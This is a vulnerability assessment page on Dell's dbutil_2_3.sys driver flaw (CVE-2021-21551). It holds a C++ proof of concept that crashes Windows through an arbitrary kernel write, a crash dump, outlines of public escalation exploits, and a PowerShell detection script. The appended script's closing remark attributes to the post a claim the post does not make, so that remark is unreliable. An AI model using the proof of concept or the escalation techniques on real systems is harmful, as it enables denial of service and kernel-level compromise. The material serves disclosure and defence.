CVSS3: 7.8 High (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H)
  Attack Vector: LOCAL; Attack Complexity: LOW; Privileges Required: LOW; User Interaction: NONE; Scope: UNCHANGED; Confidentiality Impact: HIGH; Integrity Impact: HIGH; Availability Impact: HIGH
CVSS2: 4.6 Medium (AV:L/AC:L/Au:N/C:P/I:P/A:P)
  Access Vector: LOCAL; Access Complexity: LOW; Authentication: NONE; Confidentiality Impact: PARTIAL; Integrity Impact: PARTIAL; Availability Impact: PARTIAL
EPSS: 0.002 Low (Percentile 51.5%)
Dell dbutil_2_3.sys driver contains an insufficient access control vulnerability which may lead to escalation of privileges, denial of service, or information disclosure. Local authenticated user access is required.
Recent assessments:
jbaines-r7 at October 25, 2021 8:11pm UTC reported:
On May 4, 2021, Dell released Dell Security Advisory 2021-088 which describes a privilege escalation vulnerability in their dbutil_2_3.sys driver. The vulnerability is assigned CVE-2021-21551 and NIST assigned it a CVSSv3 score of 7.8. The vulnerable driver is utilized during the firmware update process and is therefore widely deployed across Dell products. Please see the advisory for the full list of impacted products.
The vulnerability is the result of a write-what-where condition (CWE-123) in which a low privileged user can direct the driver to write attacker controlled data to an arbitrary memory address via an ioctl call. This allows the low privileged user to escalate permissions to SYSTEM by overwriting data structures in kernel memory. Arbitrary modification of kernel memory is also useful to an attacker with SYSTEM privileges to bypass or disable security features that are not otherwise accessible. As such, the vulnerable driver could reasonably be used in Bring Your Own Vulnerable Driver (BYOVD) attacks in the wild.
A variety of public exploits, including a Metasploit module, have been published for this vulnerability. The vulnerability has also been reportedly used in the wild.
The following products are affected. Please see DSA-2021-088 Table A for an extensive list of affected platforms and versions.
Firmware update utility packages, including BIOS update utilities, Thunderbolt firmware update utilities, TPM firmware update utilities and dock firmware update utilities.
All Dell Download Notification solutions. Dell Command Update, Dell Update, Alienware Update, and Dell SupportAssist for PCs.
Dell System Inventory Agent
Dell Platform Tags
Dell BIOS Flash Utility
The vulnerability can be recreated using this minimized proof of concept:
#include <cstdlib>
#include <cstdint>
#include <iostream>
#include <string>
#include <Windows.h>

namespace
{
    // Device name exposed by the vulnerable driver; its DACL grants access to Everyone.
    const std::string s_driverHandle("\\\\.\\DBUtil_2_3");
    // IOCTL control code whose handler passes struct members straight into memmove.
    const uint32_t s_write_ioctl = 0x9b0c1ec8;

    // 32-byte input buffer; only write_ptr and write_data are consumed by the driver.
    struct exploit_struct
    {
        uint64_t unused0;
        void* write_ptr;     // used as the memmove dest
        uint64_t unused1;
        uint64_t write_data; // its address is used as the memmove src
    };
}

int main(int p_argc, char** p_argv)
{
    HANDLE driverHandle = CreateFileA(s_driverHandle.c_str(), GENERIC_WRITE | GENERIC_READ, 0, 0, OPEN_EXISTING, 0, 0);
    if (INVALID_HANDLE_VALUE == driverHandle)
    {
        std::cerr << "[!] Failed to get a handle to " << s_driverHandle << std::endl;
        return EXIT_FAILURE;
    }

    // Invalid destination address: the kernel-mode write faults and the system bug checks.
    exploit_struct crash = { 0, (void*)0x4141414141414141, 0, 0 };
    char outBuf[32] = { 0 };
    DWORD bytesReturned = 0;
    DeviceIoControl(driverHandle, s_write_ioctl, &crash, sizeof(exploit_struct), &outBuf, sizeof(outBuf), &bytesReturned, 0);

    // Only reached if the ioctl did not fault (e.g. a non-vulnerable driver answered).
    CloseHandle(driverHandle);
    return EXIT_FAILURE;
}
In the above proof of concept, we open a handle to \\.\DBUtil_2_3 and issue ioctl control code 0x9b0c1ec8. With the ioctl code we also provide a 32-byte struct containing the exploit logic. Exploitation is possible because some of the struct’s members are passed directly into a memmove. As a reminder, memmove is defined as:
void *memmove(void *dest, const void *src, size_t n);
The address stored in the struct’s write_ptr will be used as the dest parameter in the vulnerable memmove and a pointer to the write_data member will be used as the src parameter. That means that the contents of write_data will be written to the address pointed to by write_ptr.
The above screenshot shows the affected function and memmove call. Note that Ghidra identifies the function as a memcpy but, for our purposes, the distinction doesn’t matter much.
The proof of concept above will attempt to write 8 bytes of 0 to the address 0x4141414141414141. Analysis of the resulting crash below shows the attempted write of 0 to 0x4141414141414141:
CONTEXT: ffffb30c576add00 -- (.cxr 0xffffb30c576add00)
rax=0000000000000000 rbx=ffffa20f0749bec0 rcx=4141414141414141
rdx=bebe60cdc7729697 rsi=0000000000000001 rdi=ffffa20f0749bec0
rip=fffff8047c5d17b2 rsp=ffffb30c576ae708 rbp=ffffa20f07ec2b10
r8=0000000000000007 r9=ffffa20f08b3d7c0 r10=fffff8047c5d1170
r11=4141414141414141 r12=0000000000000000 r13=0000000000000000
r14=ffffa20f09c0f7f0 r15=ffffa20f0749bd70
iopl=0 nv up ei pl nz na pe nc
cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00050202
DBUtil_2_3+0x17b2:
fffff804`7c5d17b2 8801 mov byte ptr [rcx],al ds:002b:41414141`41414141=??
Resetting default scope
PROCESS_NAME: crasher.exe
The various public exploits for this vulnerability have taken a few approaches to exploitation. @waldoirc’s exploit grants the attacker SeImpersonatePrivilege and then impersonates SYSTEM via a named pipe to escalate privileges. @Void_Sec and @zeroSteiner both wrote exploits that modified the process token for privilege escalation. And @33y0re went the extra mile and achieved privilege escalation via page table corruption.
While all of the previously mentioned exploits are for low privileged users to escalate to SYSTEM, it also appears likely that this vulnerability is being used in BYOVD attacks. The following VirusTotal screenshot shows the coin-miner TJprojMain has been observed to drop dbutil_2_3.sys to disk.
Dell didn’t truly patch this issue. Their mitigation involved deleting dbutil_2_3.sys and switching to a driver named DBUtilDrv2.sys, a driver that has existed since at least 2019. While the two drivers share some code, there is a notable difference in structure. Perhaps most importantly though, DBUtilDrv2.sys is not accessible to localhost\Everyone like dbutil_2_3.sys is.
Processed 1 device objects.
0: kd> !devobj ffffd9884bb95670
Device object (ffffd9884bb95670) is for:
DBUtil_2_5 \Driver\DBUtilDrv2 DriverObject ffffd9884bba3800
Current Irp 00000000 RefCount 0 Type 00000022 Flags 00002044
SecurityDescriptor ffffc90b6d294ba0 DevExt ffffd9884bb95560 DevObjExt ffffd9884bb957e8
ExtensionFlags (0000000000)
Characteristics (0x00000100) FILE_DEVICE_SECURE_OPEN
AttachedTo (Lower) ffffd9884b359730 \Driver\PnpManager
Device queue is not busy.
0: kd> !sd ffffc90b6d294ba0 0x1
->Revision: 0x1
->Sbz1 : 0x0
->Control : 0x9814
SE_DACL_PRESENT
SE_SACL_PRESENT
SE_SACL_AUTO_INHERITED
SE_DACL_PROTECTED
SE_SELF_RELATIVE
->Owner : S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Group : S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl :
->Dacl : ->AclRevision: 0x2
->Dacl : ->Sbz1 : 0x0
->Dacl : ->AclSize : 0x58
->Dacl : ->AceCount : 0x3
->Dacl : ->Sbz2 : 0x0
->Dacl : ->Ace[0]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[0]: ->AceFlags: 0x0
->Dacl : ->Ace[0]: ->AceSize: 0x14
->Dacl : ->Ace[0]: ->Mask : 0x001f01ff
->Dacl : ->Ace[0]: ->SID: S-1-5-18 (Well Known Group: NT AUTHORITY\SYSTEM)
->Dacl : ->Ace[1]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[1]: ->AceFlags: 0x0
->Dacl : ->Ace[1]: ->AceSize: 0x18
->Dacl : ->Ace[1]: ->Mask : 0x001f01ff
->Dacl : ->Ace[1]: ->SID: S-1-5-32-544 (Alias: BUILTIN\Administrators)
->Dacl : ->Ace[2]: ->AceType: ACCESS_ALLOWED_ACE_TYPE
->Dacl : ->Ace[2]: ->AceFlags: 0x0
->Dacl : ->Ace[2]: ->AceSize: 0x24
->Dacl : ->Ace[2]: ->Mask : 0x001f01ff
->Dacl : ->Ace[2]: ->SID: S-1-5-21-3819158199-2843755626-3941670155-500 (User: AlbinoLobsterDev\Administrator)
Unfortunately, amongst the shared code is the vulnerable ioctl and memmove. The proof of concept crashing exploit that is presented at the beginning of this post can trigger a BSOD against DBUtilDrv2.sys versions 2.5 and 2.6 with minimal tweaking, which likely means an attacker with administrative privileges could also use DBUtilDrv2.sys in BYOVD-style attacks to gain Ring0 access.
Dell addressed issues with DBUtilDrv2.sys in August 2021 and assigned CVE-2021-36276. See DSA-2021-152 for additional details.
Dell has a fairly extensive mitigations and update guide in DSA-2021-088. But there are a few simple ways to determine if your systems may be vulnerable. You can look for dbutil_2_3.sys in C:\Windows\Temp or %APPDATA%\Temp. You can also look for a running instance by querying service control with the following command: sc.exe query DBUtil_2_3. Example output follows:
C:\Windows\system32>sc.exe query DBUtil_2_3
SERVICE_NAME: DBUtil_2_3
TYPE : 1 KERNEL_DRIVER
STATE : 4 RUNNING
(STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)
WIN32_EXIT_CODE : 0 (0x0)
SERVICE_EXIT_CODE : 0 (0x0)
CHECKPOINT : 0x0
WAIT_HINT : 0x0
CrowdStrike Falcon Detects Kernel Attacks Exploiting Vulnerable Dell Driver (CVE-2021-21551)
Exploit Development: CVE-2021-21551 – Dell ‘dbutil_2_3.sys’ Kernel Exploit Writeup
CVE-2021-21551: An Extended Writeup on a Vulnerable Kernel Driver
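As an added defender-side example (not part of the assessment above and not Dell's tooling), the following PowerShell script automates the two checks the post describes: the driver file in the named Temp directories and a registered DBUtil_2_3 service found through sc.exe query. It assumes an elevated prompt on the host being checked; the service name for DBUtilDrv2.sys is not given in the post, so that driver is only reported where it sits on disk, with its file version, for comparison against the 2.5/2.6 versions the post calls affected.

```powershell
# Added example, not from the AttackerKB post. Exit codes: 0 nothing found,
# 1 driver file(s) on disk only, 2 DBUtil_2_3 service registered (strongest signal).
$findings = @()

# 1. Driver files in the locations named in the post.
$searchRoots = @("$env:windir\Temp", "$env:APPDATA\Temp") | Where-Object { Test-Path $_ }
$driverNames = @('dbutil_2_3.sys', 'DBUtilDrv2.sys')

foreach ($root in $searchRoots) {
    Get-ChildItem -Path $root -Recurse -File -Include $driverNames -ErrorAction SilentlyContinue |
        ForEach-Object {
            $findings += [pscustomobject]@{
                Indicator = 'DriverOnDisk'
                Detail    = $_.FullName
                # DBUtilDrv2.sys 2.5 and 2.6 are affected per the post (CVE-2021-36276).
                Version   = $_.VersionInfo.FileVersion
                # Recorded for incident response; no known-bad hash is assumed here.
                Sha256    = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
            }
        }
}

# 2. Query the Service Control Manager exactly as the post does and parse the
#    STATE line ("STATE : 4 RUNNING"). sc.exe returns non-zero (1060) when the
#    service does not exist.
$scOutput = & sc.exe query DBUtil_2_3 2>&1
if ($LASTEXITCODE -eq 0) {
    $stateMatch = $scOutput | Select-String -Pattern '^\s*STATE\s*:\s*\d+\s+(\w+)'
    $state = if ($stateMatch) { $stateMatch.Matches[0].Groups[1].Value } else { 'UNKNOWN' }
    $findings += [pscustomobject]@{
        Indicator = 'ServiceRegistered'
        Detail    = "DBUtil_2_3 service present, state $state"
        Version   = ''
        Sha256    = ''
    }
}

# 3. Report. A registered service means \\.\DBUtil_2_3 can be opened by any
#    local user, which is the precondition for the write-what-where above.
if ($findings.Count -eq 0) {
    Write-Output 'No DBUtil indicators found.'
    exit 0
}
$findings | Format-Table -AutoSize
if ($findings.Indicator -contains 'ServiceRegistered') { exit 2 } else { exit 1 }
```

Removing a found file alone is not a fix: the post notes the driver is re-dropped by Dell's update utilities, so the exit code is meant to feed a fleet-wide inventory while the DSA-2021-088 guidance is applied.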
wvu-r7 at May 06, 2021 5:47pm UTC reported:
Assessed Attacker Value: 4
packetstormsecurity.com/files/162604/Dell-DBUtil_2_3.sys-IOCTL-Memory-Read-Write.html
packetstormsecurity.com/files/162739/DELL-dbutil_2_3.sys-2.3-Arbitrary-Write-Privilege-Escalation.html
cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-21551
www.dell.com/support/kbdoc/en-us/000186019/dsa-2021-088-dell-client-platform-security-update-for-dell-driver-insufficient-access-control-vulnerability